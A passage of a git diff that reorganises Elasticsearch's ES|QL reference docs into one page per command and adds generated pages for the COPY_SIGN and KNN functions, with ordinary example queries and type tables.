b/docs/reference/query-languages/esql/_snippets/commands/layout/where.md @@ -1,4 +1,7 @@ -## `WHERE` [esql-where] +```yaml {applies_to} +serverless: ga +stack: ga +``` The `WHERE` processing command produces a table that contains all the rows from the input table for which the provided condition evaluates to `true`. diff --git a/docs/reference/query-languages/esql/_snippets/commands/types/lookup-join.md b/docs/reference/query-languages/esql/_snippets/commands/types/lookup-join.md new file mode 100644 index 0000000000000..3e54f0ad66277 --- /dev/null +++ b/docs/reference/query-languages/esql/_snippets/commands/types/lookup-join.md @@ -0,0 +1,21 @@ +% This is generated by ESQL's AbstractFunctionTestCase. Do not edit it. See ../README.md for how to regenerate it. + +**Supported types** + +| field from the left index | field from the lookup index | +| --- | --- | +| boolean | boolean | +| byte | half_float, float, double, scaled_float, byte, short, integer, long | +| date | date | +| date_nanos | date_nanos | +| double | half_float, float, double, scaled_float, byte, short, integer, long | +| float | half_float, float, double, scaled_float, byte, short, integer, long | +| half_float | half_float, float, double, scaled_float, byte, short, integer, long | +| integer | half_float, float, double, scaled_float, byte, short, integer, long | +| ip | ip | +| keyword | keyword | +| long | half_float, float, double, scaled_float, byte, short, integer, long | +| scaled_float | half_float, float, double, scaled_float, byte, short, integer, long | +| short | half_float, float, double, scaled_float, byte, short, integer, long | +| text | keyword | + diff --git a/docs/reference/query-languages/esql/_snippets/common/result-set-size-limitation.md b/docs/reference/query-languages/esql/_snippets/common/result-set-size-limitation.md index 1a6b4dada3dd7..64912b9450a33 100644 --- a/docs/reference/query-languages/esql/_snippets/common/result-set-size-limitation.md +++ b/docs/reference/query-languages/esql/_snippets/common/result-set-size-limitation.md @@ -11,8 +11,8 @@ Queries do not return more than 10,000 rows, regardless of the `LIMIT` command To overcome this limitation: -* Reduce the result set size by modifying the query to only return relevant data. Use [`WHERE`](/reference/query-languages/esql/commands/processing-commands.md#esql-where) to select a smaller subset of the data. -* Shift any post-query processing to the query itself. You can use the {{esql}} [`STATS`](/reference/query-languages/esql/commands/processing-commands.md#esql-stats-by) command to aggregate data in the query. +* Reduce the result set size by modifying the query to only return relevant data. Use [`WHERE`](/reference/query-languages/esql/commands/where.md) to select a smaller subset of the data. +* Shift any post-query processing to the query itself. You can use the {{esql}} [`STATS`](/reference/query-languages/esql/commands/stats-by.md) command to aggregate data in the query. The upper limit only applies to the number of rows that are output by the query, not to the number of documents it processes: the query runs on the full data set. diff --git a/docs/reference/query-languages/esql/_snippets/functions/description/copy_sign.md b/docs/reference/query-languages/esql/_snippets/functions/description/copy_sign.md new file mode 100644 index 0000000000000..54ab4a25f48c8 --- /dev/null +++ b/docs/reference/query-languages/esql/_snippets/functions/description/copy_sign.md @@ -0,0 +1,6 @@ +% This is generated by ESQL's AbstractFunctionTestCase. Do not edit it. See ../README.md for how to regenerate it. + +**Description** + +Returns a value with the magnitude of the first argument and the sign of the second argument. This function is similar to Java's Math.copySign(double magnitude, double sign) which is similar to `copysign` from [IEEE 754](https://en.wikipedia.org/wiki/IEEE_754). + diff --git a/docs/reference/query-languages/esql/_snippets/functions/description/knn.md b/docs/reference/query-languages/esql/_snippets/functions/description/knn.md new file mode 100644 index 0000000000000..c39604bbf1fa6 --- /dev/null +++ b/docs/reference/query-languages/esql/_snippets/functions/description/knn.md @@ -0,0 +1,6 @@ +% This is generated by ESQL's AbstractFunctionTestCase. Do not edit it. See ../README.md for how to regenerate it. + +**Description** + +Finds the k nearest vectors to a query vector, as measured by a similarity metric. knn function finds nearest vectors through approximate search on indexed dense_vectors. + diff --git a/docs/reference/query-languages/esql/_snippets/functions/description/md5.md b/docs/reference/query-languages/esql/_snippets/functions/description/md5.md index 976d3e48a6bfa..cf702ee523749 100644 --- a/docs/reference/query-languages/esql/_snippets/functions/description/md5.md +++ b/docs/reference/query-languages/esql/_snippets/functions/description/md5.md @@ -2,5 +2,5 @@ **Description** -Computes the MD5 hash of the input. +Computes the MD5 hash of the input (if the MD5 hash is available on the JVM). diff --git a/docs/reference/query-languages/esql/_snippets/functions/examples/bucket.md b/docs/reference/query-languages/esql/_snippets/functions/examples/bucket.md index 76901580aed49..ad1275cf37b51 100644 --- a/docs/reference/query-languages/esql/_snippets/functions/examples/bucket.md +++ b/docs/reference/query-languages/esql/_snippets/functions/examples/bucket.md @@ -75,7 +75,7 @@ FROM employees ::::{note} `BUCKET` does not filter any rows. It only uses the provided range to pick a good bucket size. For rows with a value outside of the range, it returns a bucket value that corresponds to a bucket outside the range. -Combine `BUCKET` with [`WHERE`](/reference/query-languages/esql/commands/processing-commands.md#esql-where) to filter rows. +Combine `BUCKET` with [`WHERE`](/reference/query-languages/esql/commands/where.md) to filter rows. :::: If the desired bucket size is known in advance, simply provide it as the second @@ -179,7 +179,7 @@ FROM employees | 54539.75 | 1985-11-01T00:00:00.000Z | `BUCKET` may be used in both the aggregating and grouping part of the -[STATS ... BY ...](/reference/query-languages/esql/commands/processing-commands.md#esql-stats-by) command provided that in the aggregating +[STATS ... BY ...](/reference/query-languages/esql/commands/stats-by.md) command provided that in the aggregating part the function is referenced by an alias defined in the grouping part, or that it is invoked with the exact same expression: diff --git a/docs/reference/query-languages/esql/_snippets/functions/examples/count.md b/docs/reference/query-languages/esql/_snippets/functions/examples/count.md index 98a7f0c930b4c..cad958a96dbc4 100644 --- a/docs/reference/query-languages/esql/_snippets/functions/examples/count.md +++ b/docs/reference/query-languages/esql/_snippets/functions/examples/count.md @@ -39,7 +39,7 @@ ROW words="foo;bar;baz;qux;quux;foo" | --- | | 6 | -To count the number of times an expression returns `TRUE` use a [`WHERE`](/reference/query-languages/esql/commands/processing-commands.md#esql-where) command to remove rows that shouldn’t be included +To count the number of times an expression returns `TRUE` use a [`WHERE`](/reference/query-languages/esql/commands/where.md) command to remove rows that shouldn’t be included ```esql ROW n=1 diff --git a/docs/reference/query-languages/esql/_snippets/functions/examples/date_trunc.md b/docs/reference/query-languages/esql/_snippets/functions/examples/date_trunc.md index f6168c1893976..f446855dcfaa5 100644 --- a/docs/reference/query-languages/esql/_snippets/functions/examples/date_trunc.md +++ b/docs/reference/query-languages/esql/_snippets/functions/examples/date_trunc.md @@ -14,8 +14,7 @@ FROM employees | Amabile | Gomatam | 1992-11-18T00:00:00.000Z | 1992-01-01T00:00:00.000Z | | Anneke | Preusig | 1989-06-02T00:00:00.000Z | 1989-01-01T00:00:00.000Z | -Combine `DATE_TRUNC` with [`STATS`](/reference/query-languages/esql/commands/processing-commands.md#esql-stats-by) to create date histograms. For -example, the number of hires per year: +Combine `DATE_TRUNC` with [`STATS`](/reference/query-languages/esql/commands/stats-by.md) to create date histograms. For example, the number of hires per year: ```esql FROM employees diff --git a/docs/reference/query-languages/esql/_snippets/functions/examples/knn.md b/docs/reference/query-languages/esql/_snippets/functions/examples/knn.md new file mode 100644 index 0000000000000..2a474d7bfef13 --- /dev/null +++ b/docs/reference/query-languages/esql/_snippets/functions/examples/knn.md @@ -0,0 +1,30 @@ +% This is generated by ESQL's AbstractFunctionTestCase. Do not edit it. See ../README.md for how to regenerate it. + +**Examples** + +```esql +from colors metadata _score +| where knn(rgb_vector, [0, 120, 0]) +| sort _score desc, color asc +``` + +| color:text | rgb_vector:dense_vector | +| --- | --- | +| green | [0.0, 128.0, 0.0] | +| black | [0.0, 0.0, 0.0] | +| olive | [128.0, 128.0, 0.0] | +| teal | [0.0, 128.0, 128.0] | +| lime | [0.0, 255.0, 0.0] | +| sienna | [160.0, 82.0, 45.0] | +| maroon | [128.0, 0.0, 0.0] | +| navy | [0.0, 0.0, 128.0] | +| gray | [128.0, 128.0, 128.0] | +| chartreuse | [127.0, 255.0, 0.0] | + +```esql +from colors metadata _score +| where knn(rgb_vector, [0,255,255], {"k": 4}) +| sort _score desc, color asc +``` + + diff --git a/docs/reference/query-languages/esql/_snippets/functions/functionNamedParams/knn.md b/docs/reference/query-languages/esql/_snippets/functions/functionNamedParams/knn.md new file mode 100644 index 0000000000000..d663e403f8a42 --- /dev/null +++ b/docs/reference/query-languages/esql/_snippets/functions/functionNamedParams/knn.md @@ -0,0 +1,19 @@ +% This is generated by ESQL's AbstractFunctionTestCase. Do not edit it. See ../README.md for how to regenerate it. + +**Supported function named parameters** + +`num_candidates` +: (integer) The number of nearest neighbor candidates to consider per shard while doing knn search. Cannot exceed 10,000. Increasing num_candidates tends to improve the accuracy of the final results. Defaults to 1.5 * k + +`boost` +: (float) Floating point number used to decrease or increase the relevance scores of the query.Defaults to 1.0. + +`k` +: (integer) The number of nearest neighbors to return from each shard. Elasticsearch collects k results from each shard, then merges them to find the global top results. This value must be less than or equal to num_candidates. Defaults to 10. + +`rescore_oversample` +: (double) Applies the specified oversampling for rescoring quantized vectors. See [oversampling and rescoring quantized vectors](docs-content://solutions/search/vector/knn.md#dense-vector-knn-search-rescoring) for details. + +`similarity` +: (double) The minimum similarity required for a document to be considered a match. The similarity value calculated relates to the raw similarity used, not the document score. + diff --git a/docs/reference/query-languages/esql/_snippets/functions/layout/categorize.md b/docs/reference/query-languages/esql/_snippets/functions/layout/categorize.md index ca23c1e2efc23..6667980ef84eb 100644 --- a/docs/reference/query-languages/esql/_snippets/functions/layout/categorize.md +++ b/docs/reference/query-languages/esql/_snippets/functions/layout/categorize.md @@ -1,6 +1,9 @@ % This is generated by ESQL's AbstractFunctionTestCase. Do not edit it. See ../README.md for how to regenerate it. ## `CATEGORIZE` [esql-categorize] +```{applies_to} +stack: preview 9.0, ga 9.1 +``` **Syntax** diff --git a/docs/reference/query-languages/esql/_snippets/functions/layout/copy_sign.md b/docs/reference/query-languages/esql/_snippets/functions/layout/copy_sign.md new file mode 100644 index 0000000000000..7c423b66344fd --- /dev/null +++ b/docs/reference/query-languages/esql/_snippets/functions/layout/copy_sign.md @@ -0,0 +1,20 @@ +% This is generated by ESQL's AbstractFunctionTestCase. Do not edit it. See ../README.md for how to regenerate it. + +## `COPY_SIGN` [esql-copy_sign] + +**Syntax** + +:::{image} ../../../images/functions/copy_sign.svg +:alt: Embedded +:class: text-center +::: + + +:::{include} ../parameters/copy_sign.md +::: + +:::{include} ../description/copy_sign.md +::: + +:::{include} ../types/copy_sign.md +::: diff --git a/docs/reference/query-languages/esql/_snippets/functions/layout/knn.md b/docs/reference/query-languages/esql/_snippets/functions/layout/knn.md new file mode 100644 index 0000000000000..dae08f95757b9 --- /dev/null +++ b/docs/reference/query-languages/esql/_snippets/functions/layout/knn.md @@ -0,0 +1,30 @@ +% This is generated by ESQL's AbstractFunctionTestCase. Do not edit it. See ../README.md for how to regenerate it. + +## `KNN` [esql-knn] +```{applies_to} +stack: development +serverless: preview +``` + +**Syntax** + +:::{image} ../../../images/functions/knn.svg +:alt: Embedded +:class: text-center +::: + + +:::{include} ../parameters/knn.md +::: + +:::{include} ../description/knn.md +::: + +:::{include} ../types/knn.md +::: + +:::{include} ../functionNamedParams/knn.md +::: + +:::{include} ../examples/knn.md +::: diff --git a/docs/reference/query-languages/esql/_snippets/functions/layout/match_phrase.md b/docs/reference/query-languages/esql/_snippets/functions/layout/match_phrase.md index 6eb9e17bf35f9..f658fbf1bbde2 100644 --- a/docs/reference/query-languages/esql/_snippets/functions/layout/match_phrase.md +++ b/docs/reference/query-languages/esql/_snippets/functions/layout/match_phrase.md @@ -2,7 +2,7 @@ ## `MATCH_PHRASE` [esql-match_phrase] ```{applies_to} -stack: unavailable 9.0, ga 9.1.0 +stack: ga 9.1.0 ``` **Syntax** diff --git a/docs/reference/query-languages/esql/_snippets/functions/layout/sample.md b/docs/reference/query-languages/esql/_snippets/functions/layout/sample.md index 05d8cef498116..9fd348abe8cd9 100644 --- a/docs/reference/query-languages/esql/_snippets/functions/layout/sample.md +++ b/docs/reference/query-languages/esql/_snippets/functions/layout/sample.md @@ -1,6 +1,9 @@ % This is generated by ESQL's AbstractFunctionTestCase. Do not edit it. See ../README.md for how to regenerate it. ## `SAMPLE` [esql-sample] +```{applies_to} +stack: ga 9.1.0 +``` **Syntax** diff --git a/docs/reference/query-languages/esql/_snippets/functions/layout/scalb.md b/docs/reference/query-languages/esql/_snippets/functions/layout/scalb.md index 19ff3246f4ca1..bae02950efa6c 100644 --- a/docs/reference/query-languages/esql/_snippets/functions/layout/scalb.md +++ b/docs/reference/query-languages/esql/_snippets/functions/layout/scalb.md @@ -1,6 +1,9 @@ % This is generated by ESQL's AbstractFunctionTestCase. Do not edit it. See ../README.md for how to regenerate it. ## `SCALB` [esql-scalb] +```{applies_to} +stack: ga 9.1.0 +``` **Syntax** diff --git a/docs/reference/query-languages/esql/_snippets/functions/parameters/copy_sign.md b/docs/reference/query-languages/esql/_snippets/functions/parameters/copy_sign.md new file mode 100644 index 0000000000000..78de6d0388741 --- /dev/null +++ b/docs/reference/query-languages/esql/_snippets/functions/parameters/copy_sign.md @@ -0,0 +1,10 @@ +% This is generated by ESQL's AbstractFunctionTestCase. Do not edit it. See ../README.md for how to regenerate it. + +**Parameters** + +`magnitude` +: The expression providing the magnitude of the result. Must be a numeric type. + +`sign` +: The expression providing the sign of the result. Must be a numeric type. + diff --git a/docs/reference/query-languages/esql/_snippets/functions/parameters/knn.md b/docs/reference/query-languages/esql/_snippets/functions/parameters/knn.md new file mode 100644 index 0000000000000..fb1b98a1e8a7a --- /dev/null +++ b/docs/reference/query-languages/esql/_snippets/functions/parameters/knn.md @@ -0,0 +1,13 @@ +% This is generated by ESQL's AbstractFunctionTestCase. Do not edit it. See ../README.md for how to regenerate it. + +**Parameters** + +`field` +: Field that the query will target. + +`query` +: Vector value to find top nearest neighbours for. + +`options` +: (Optional) kNN additional options as [function named parameters](/reference/query-languages/esql/esql-syntax.md#esql-function-named-params). See [knn query](/reference/query-languages/query-dsl/query-dsl-match-query.md#query-dsl-knn-query) for more information. + diff --git a/docs/reference/query-languages/esql/_snippets/functions/types/copy_sign.md b/docs/reference/query-languages/esql/_snippets/functions/types/copy_sign.md new file mode 100644 index 0000000000000..a0cbc6eed3f8e --- /dev/null +++ b/docs/reference/query-languages/esql/_snippets/functions/types/copy_sign.md @@ -0,0 +1,16 @@ +% This is generated by ESQL's AbstractFunctionTestCase. Do not edit it. See ../README.md for how to regenerate it. + +**Supported types** + +| magnitude | sign | result | +| --- | --- | --- | +| double | double | double | +| double | integer | double | +| double | long | double | +| integer | double | integer | +| integer | integer | integer | +| integer | long | integer | +| long | double | long | +| long | integer | long | +| long | long | long | + diff --git a/docs/reference/query-languages/esql/_snippets/lists/math-functions.md b/docs/reference/query-languages/esql/_snippets/lists/math-functions.md index 54c1a4dd9635a..5ef3b6c499a1b 100644 --- a/docs/reference/query-languages/esql/_snippets/lists/math-functions.md +++ b/docs/reference/query-languages/esql/_snippets/lists/math-functions.md @@ -5,6 +5,7 @@ * [`ATAN2`](../../functions-operators/math-functions.md#esql-atan2) * [`CBRT`](../../functions-operators/math-functions.md#esql-cbrt) * [`CEIL`](../../functions-operators/math-functions.md#esql-ceil) +* [`COPY_SIGN`](../../functions-operators/math-functions.md#esql-copy_sign) * [`COS`](../../functions-operators/math-functions.md#esql-cos) * [`COSH`](../../functions-operators/math-functions.md#esql-cosh) * [`E`](../../functions-operators/math-functions.md#esql-e) diff --git a/docs/reference/query-languages/esql/_snippets/lists/processing-commands.md b/docs/reference/query-languages/esql/_snippets/lists/processing-commands.md index a9bf1e276b95d..85c778d3b3f8b 100644 --- a/docs/reference/query-languages/esql/_snippets/lists/processing-commands.md +++ b/docs/reference/query-languages/esql/_snippets/lists/processing-commands.md @@ -1,15 +1,17 @@ -* [preview] [`CHANGE_POINT`](../../commands/processing-commands.md#esql-change_point) -* [`DISSECT`](../../commands/processing-commands.md#esql-dissect) -* [`DROP`](../../commands/processing-commands.md#esql-drop) -* [`ENRICH`](../../commands/processing-commands.md#esql-enrich) -* [`EVAL`](../../commands/processing-commands.md#esql-eval) -* [`GROK`](../../commands/processing-commands.md#esql-grok) -* [`KEEP`](../../commands/processing-commands.md#esql-keep) -* [`LIMIT`](../../commands/processing-commands.md#esql-limit) -* [`LOOKUP JOIN`](../../commands/processing-commands.md#esql-lookup-join) -* [preview] [`MV_EXPAND`](../../commands/processing-commands.md#esql-mv_expand) -* [`RENAME`](../../commands/processing-commands.md#esql-rename) -* [preview] [`SAMPLE`](../../commands/processing-commands.md#esql-sample) -* [`SORT`](../../commands/processing-commands.md#esql-sort) -* [`STATS`](../../commands/processing-commands.md#esql-stats-by) -* [`WHERE`](../../commands/processing-commands.md#esql-where) +* [preview] [`CHANGE_POINT`](/reference/query-languages/esql/commands/change-point.md) +* [preview] [`COMPLETION`](/reference/query-languages/esql/commands/completion.md) +* [`DISSECT`](/reference/query-languages/esql/commands/dissect.md) +* [`DROP`](/reference/query-languages/esql/commands/drop.md) +* [`ENRICH`](/reference/query-languages/esql/commands/enrich.md) +* [`EVAL`](/reference/query-languages/esql/commands/eval.md) +* [`GROK`](/reference/query-languages/esql/commands/grok.md) +* [preview] [`FORK`](/reference/query-languages/esql/commands/fork.md) +* [`KEEP`](/reference/query-languages/esql/commands/keep.md) +* [`LIMIT`](/reference/query-languages/esql/commands/limit.md) +* [`LOOKUP JOIN`](/reference/query-languages/esql/commands/lookup-join.md) +* [preview] [`MV_EXPAND`](/reference/query-languages/esql/commands/mv_expand.md) +* [`RENAME`](/reference/query-languages/esql/commands/rename.md) +* [preview] [`SAMPLE`](/reference/query-languages/esql/commands/sample.md) +* [`SORT`](/reference/query-languages/esql/commands/sort.md) +* [`STATS`](/reference/query-languages/esql/commands/stats-by.md) +* [`WHERE`](/reference/query-languages/esql/commands/where.md) diff --git a/docs/reference/query-languages/esql/_snippets/lists/source-commands.md b/docs/reference/query-languages/esql/_snippets/lists/source-commands.md index 21194abdec2f7..ceaa5147da7cf 100644 --- a/docs/reference/query-languages/esql/_snippets/lists/source-commands.md +++ b/docs/reference/query-languages/esql/_snippets/lists/source-commands.md @@ -1,3 +1,3 @@ -* [`FROM`](../../commands/source-commands.md#esql-from) -* [`ROW`](../../commands/source-commands.md#esql-row) -* [`SHOW`](../../commands/source-commands.md#esql-show) +- [`FROM`](/reference/query-languages/esql/commands/from.md) +- [`ROW`](/reference/query-languages/esql/commands/row.md) +- [`SHOW`](/reference/query-languages/esql/commands/show.md) \ No newline at end of file diff --git a/docs/reference/query-languages/esql/_snippets/operators/detailedDescription/like.md b/docs/reference/query-languages/esql/_snippets/operators/detailedDescription/like.md index d000d79e0c433..0e9cff4fcefe5 100644 --- a/docs/reference/query-languages/esql/_snippets/operators/detailedDescription/like.md +++ b/docs/reference/query-languages/esql/_snippets/operators/detailedDescription/like.md @@ -10,17 +10,24 @@ ROW message = "foo * bar" ``` +To reduce the overhead of escaping, we suggest using triple quotes strings `"""` + ```esql -ROW message = "foobar" -| WHERE message like ("foo*", "bar?") +ROW message = "foo * bar" +| WHERE message LIKE """foo \* bar""" ``` -To reduce the overhead of escaping, we suggest using triple quotes strings `"""` +```{applies_to} +stack: ga 9.1 +serverless: ga +``` +Both a single pattern or a list of patterns are supported. If a list of patterns is provided, +the expression will return true if any of the patterns match. ```esql -ROW message = "foo * bar" -| WHERE message LIKE """foo \* bar""" +ROW message = "foobar" +| WHERE message like ("foo*", "bar?") ``` diff --git a/docs/reference/query-languages/esql/_snippets/operators/examples/predicates.md b/docs/reference/query-languages/esql/_snippets/operators/examples/predicates.md deleted file mode 100644 index ba34a2d736a83..0000000000000 --- a/docs/reference/query-languages/esql/_snippets/operators/examples/predicates.md +++ /dev/null @@ -1,26 +0,0 @@ -% This is generated by ESQL's AbstractFunctionTestCase. Do not edit it. See ../README.md for how to regenerate it. - -**Examples** - -```esql -FROM employees -| WHERE birth_date IS NULL -``` - -| first_name:keyword | last_name:keyword | -| --- | --- | -| Basil | Tramer | -| Florian | Syrotiuk | -| Lucien | Rosenbaum | - -```esql -FROM employees -| WHERE is_rehired IS NOT NULL -| STATS COUNT(emp_no) -``` - -| COUNT(emp_no):long | -| --- | -| 84 | - - diff --git a/docs/reference/query-languages/esql/_snippets/operators/types/predicates.md b/docs/reference/query-languages/esql/_snippets/operators/types/predicates.md deleted file mode 100644 index 19fc0a9465976..0000000000000 --- a/docs/reference/query-languages/esql/_snippets/operators/types/predicates.md +++ /dev/null @@ -1,22 +0,0 @@ -% This is generated by ESQL's AbstractFunctionTestCase. Do not edit it. See ../README.md for how to regenerate it. - -**Supported types** - -| field | result | -| --- | --- | -| boolean | boolean | -| cartesian_point | boolean | -| cartesian_shape | boolean | -| date | boolean | -| date_nanos | boolean | -| double | boolean | -| geo_point | boolean | -| geo_shape | boolean | -| integer | boolean | -| ip | boolean | -| keyword | boolean | -| long | boolean | -| text | boolean | -| unsigned_long | boolean | -| version | boolean | - diff --git a/docs/reference/query-languages/esql/commands/change-point.md b/docs/reference/query-languages/esql/commands/change-point.md new file mode 100644 index 0000000000000..96d4c6a41868c --- /dev/null +++ b/docs/reference/query-languages/esql/commands/change-point.md @@ -0,0 +1,10 @@ +--- +navigation_title: "CHANGE_POINT" +mapped_pages: + - https://www.elastic.co/guide/en/elasticsearch/reference/current/esql-commands.html#esql-change_point +--- + +# `CHANGE_POINT` [esql-change_point] + +:::{include} ../_snippets/commands/layout/change_point.md +::: diff --git a/docs/reference/query-languages/esql/commands/completion.md b/docs/reference/query-languages/esql/commands/completion.md new file mode 100644 index 0000000000000..1d93b387b957c --- /dev/null +++ b/docs/reference/query-languages/esql/commands/completion.md @@ -0,0 +1,10 @@ +--- +navigation_title: "COMPLETION" +mapped_pages: + - https://www.elastic.co/guide/en/elasticsearch/reference/current/esql-commands.html#esql-completion +--- + +# `COMPLETION` [esql-completion] + +:::{include} ../_snippets/commands/layout/completion.md +::: diff --git a/docs/reference/query-languages/esql/commands/dissect.md b/docs/reference/query-languages/esql/commands/dissect.md new file mode 100644 index 0000000000000..54646b8b1a5d1 --- /dev/null +++ b/docs/reference/query-languages/esql/commands/dissect.md @@ -0,0 +1,10 @@ +--- +navigation_title: "DISSECT" +mapped_pages: + - https://www.elastic.co/guide/en/elasticsearch/reference/current/esql-commands.html#esql-dissect +--- + +# `DISSECT` [esql-dissect] + +:::{include} ../_snippets/commands/layout/dissect.md +::: diff --git a/docs/reference/query-languages/esql/commands/drop.md b/docs/reference/query-languages/esql/commands/drop.md new file mode 100644 index 0000000000000..dc66933e7849b --- /dev/null +++ b/docs/reference/query-languages/esql/commands/drop.md @@ -0,0 +1,10 @@ +--- +navigation_title: "DROP" +mapped_pages: + - https://www.elastic.co/guide/en/elasticsearch/reference/current/esql-commands.html#esql-drop +--- + +# `DROP` [esql-drop] + +:::{include} ../_snippets/commands/layout/drop.md +::: diff --git a/docs/reference/query-languages/esql/commands/enrich.md b/docs/reference/query-languages/esql/commands/enrich.md new file mode 100644 index 0000000000000..7b6d4f3787d7b --- /dev/null +++ b/docs/reference/query-languages/esql/commands/enrich.md @@ -0,0 +1,10 @@ +--- +navigation_title: "ENRICH" +mapped_pages: + - https://www.elastic.co/guide/en/elasticsearch/reference/current/esql-commands.html#esql-enrich +--- + +# `ENRICH` [esql-enrich] + +:::{include} ../_snippets/commands/layout/enrich.md +::: diff --git a/docs/reference/query-languages/esql/commands/eval.md b/docs/reference/query-languages/esql/commands/eval.md new file mode 100644 index 0000000000000..6a912610c95f5 --- /dev/null +++ b/docs/reference/query-languages/esql/commands/eval.md @@ -0,0 +1,10 @@ +--- +navigation_title: "EVAL" +mapped_pages: + - https://www.elastic.co/guide/en/elasticsearch/reference/current/esql-commands.html#esql-eval +--- + +# `EVAL` [esql-eval] + +:::{include} ../_snippets/commands/layout/eval.md +::: diff --git a/docs/reference/query-languages/esql/commands/fork.md b/docs/reference/query-languages/esql/commands/fork.md new file mode 100644 index 0000000000000..841c64c9d9dcf --- /dev/null +++ b/docs/reference/query-languages/esql/commands/fork.md @@ -0,0 +1,10 @@ +--- +navigation_title: "FORK" +mapped_pages: + - https://www.elastic.co/guide/en/elasticsearch/reference/current/esql-commands.html#esql-fork +--- + +# `FORK` [esql-fork] + +:::{include} ../_snippets/commands/layout/fork.md +::: diff --git a/docs/reference/query-languages/esql/commands/from.md b/docs/reference/query-languages/esql/commands/from.md new file mode 100644 index 0000000000000..0cef20784e8cc --- /dev/null +++ b/docs/reference/query-languages/esql/commands/from.md @@ -0,0 +1,10 @@ +--- +navigation_title: "FROM" +mapped_pages: + - https://www.elastic.co/guide/en/elasticsearch/reference/current/esql-commands.html#esql-from +--- + +# `FROM` [esql-from] + +:::{include} ../_snippets/commands/layout/from.md +::: diff --git a/docs/reference/query-languages/esql/commands/grok.md b/docs/reference/query-languages/esql/commands/grok.md new file mode 100644 index 0000000000000..4c895cd8d1d4f --- /dev/null +++ b/docs/reference/query-languages/esql/commands/grok.md @@ -0,0 +1,10 @@ +--- +navigation_title: "GROK" +mapped_pages: + - https://www.elastic.co/guide/en/elasticsearch/reference/current/esql-commands.html#esql-grok +--- + +# `GROK` [esql-grok] + +:::{include} ../_snippets/commands/layout/grok.md +::: diff --git a/docs/reference/query-languages/esql/commands/keep.md b/docs/reference/query-languages/esql/commands/keep.md new file mode 100644 index 0000000000000..b4ed9d4becebe --- /dev/null +++ b/docs/reference/query-languages/esql/commands/keep.md @@ -0,0 +1,10 @@ +--- +navigation_title: "KEEP" +mapped_pages: + - https://www.elastic.co/guide/en/elasticsearch/reference/current/esql-commands.html#esql-keep +--- + +# `KEEP` [esql-keep] + +:::{include} ../_snippets/commands/layout/keep.md +::: diff --git a/docs/reference/query-languages/esql/commands/limit.md b/docs/reference/query-languages/esql/commands/limit.md new file mode 100644 index 0000000000000..ba9c7f78a2267 --- /dev/null +++ b/docs/reference/query-languages/esql/commands/limit.md @@ -0,0 +1,10 @@ +--- +navigation_title: "LIMIT" +mapped_pages: + - https://www.elastic.co/guide/en/elasticsearch/reference/current/esql-commands.html#esql-limit +--- + +# `LIMIT` [esql-limit] + +:::{include} ../_snippets/commands/layout/limit.md +::: diff --git a/docs/reference/query-languages/esql/commands/lookup-join.md b/docs/reference/query-languages/esql/commands/lookup-join.md new file mode 100644 index 0000000000000..4de8fdea84718 --- /dev/null +++ b/docs/reference/query-languages/esql/commands/lookup-join.md @@ -0,0 +1,10 @@ +--- +navigation_title: "LOOKUP JOIN" +mapped_pages: + - https://www.elastic.co/guide/en/elasticsearch/reference/current/esql-commands.html#esql-lookup-join +--- + +# `LOOKUP JOIN` [esql-lookup-join] + +:::{include} ../_snippets/commands/layout/lookup-join.md +::: diff --git a/docs/reference/query-languages/esql/commands/mv_expand.md b/docs/reference/query-languages/esql/commands/mv_expand.md new file mode 100644 index 0000000000000..eed1d35c11297 --- /dev/null +++ b/docs/reference/query-languages/esql/commands/mv_expand.md @@ -0,0 +1,10 @@ +--- +navigation_title: "MV_EXPAND" +mapped_pages: + - https://www.elastic.co/guide/en/elasticsearch/reference/current/esql-commands.html#esql-mv_expand +--- + +# `MV_EXPAND` [esql-mv_expand] + +:::{include} ../_snippets/commands/layout/mv_expand.md +::: diff --git a/docs/reference/query-languages/esql/commands/processing-commands.md b/docs/reference/query-languages/esql/commands/processing-commands.md index 57084779d6d7a..5af3208256242 100644 --- a/docs/reference/query-languages/esql/commands/processing-commands.md +++ b/docs/reference/query-languages/esql/commands/processing-commands.md @@ -1,4 +1,7 @@ --- +applies_to: + stack: + serverless: navigation_title: "Processing commands" mapped_pages: - https://www.elastic.co/guide/en/elasticsearch/reference/current/esql-commands.html @@ -16,48 +19,3 @@ mapped_pages: :::{include} ../_snippets/lists/processing-commands.md ::: - -:::{include} ../_snippets/commands/layout/change_point.md -::: - -:::{include} ../_snippets/commands/layout/dissect.md -::: - -:::{include} ../_snippets/commands/layout/drop.md -::: - -:::{include} ../_snippets/commands/layout/enrich.md -::: - -:::{include} ../_snippets/commands/layout/eval.md -::: - -:::{include} ../_snippets/commands/layout/grok.md -::: - -:::{include} ../_snippets/commands/layout/keep.md -::: - -:::{include} ../_snippets/commands/layout/limit.md -::: - -:::{include} ../_snippets/commands/layout/lookup-join.md -::: - -:::{include} ../_snippets/commands/layout/mv_expand.md -::: - -:::{include} ../_snippets/commands/layout/rename.md -::: - -:::{include} ../_snippets/commands/layout/sample.md -::: - -:::{include} ../_snippets/commands/layout/sort.md -::: - -:::{include} ../_snippets/commands/layout/stats-by.md -::: - -:::{include} ../_snippets/commands/layout/where.md -::: diff --git a/docs/reference/query-languages/esql/commands/rename.md b/docs/reference/query-languages/esql/commands/rename.md new file mode 100644 index 0000000000000..a21bda78f5025 --- /dev/null +++ b/docs/reference/query-languages/esql/commands/rename.md @@ -0,0 +1,10 @@ +--- +navigation_title: "RENAME" +mapped_pages: + - https://www.elastic.co/guide/en/elasticsearch/reference/current/esql-commands.html#esql-rename +--- + +# `RENAME` [esql-rename] + +:::{include} ../_snippets/commands/layout/rename.md +::: diff --git a/docs/reference/query-languages/esql/commands/row.md b/docs/reference/query-languages/esql/commands/row.md new file mode 100644 index 0000000000000..1c5d180c87cc7 --- /dev/null +++ b/docs/reference/query-languages/esql/commands/row.md @@ -0,0 +1,10 @@ +--- +navigation_title: "ROW" +mapped_pages: + - https://www.elastic.co/guide/en/elasticsearch/reference/current/esql-commands.html#esql-row +--- + +# `ROW` [esql-row] + +:::{include} ../_snippets/commands/layout/row.md +::: diff --git a/docs/reference/query-languages/esql/commands/sample.md b/docs/reference/query-languages/esql/commands/sample.md new file mode 100644 index 0000000000000..3e9ed11428175 --- /dev/null +++ b/docs/reference/query-languages/esql/commands/sample.md @@ -0,0 +1,10 @@ +--- +navigation_title: "SAMPLE" +mapped_pages: + - https://www.elastic.co/guide/en/elasticsearch/reference/current/esql-commands.html#esql-sample +--- + +# `SAMPLE` [esql-sample] + +:::{include} ../_snippets/commands/layout/sample.md +::: diff --git a/docs/reference/query-languages/esql/commands/show.md b/docs/reference/query-languages/esql/commands/show.md new file mode 100644 index 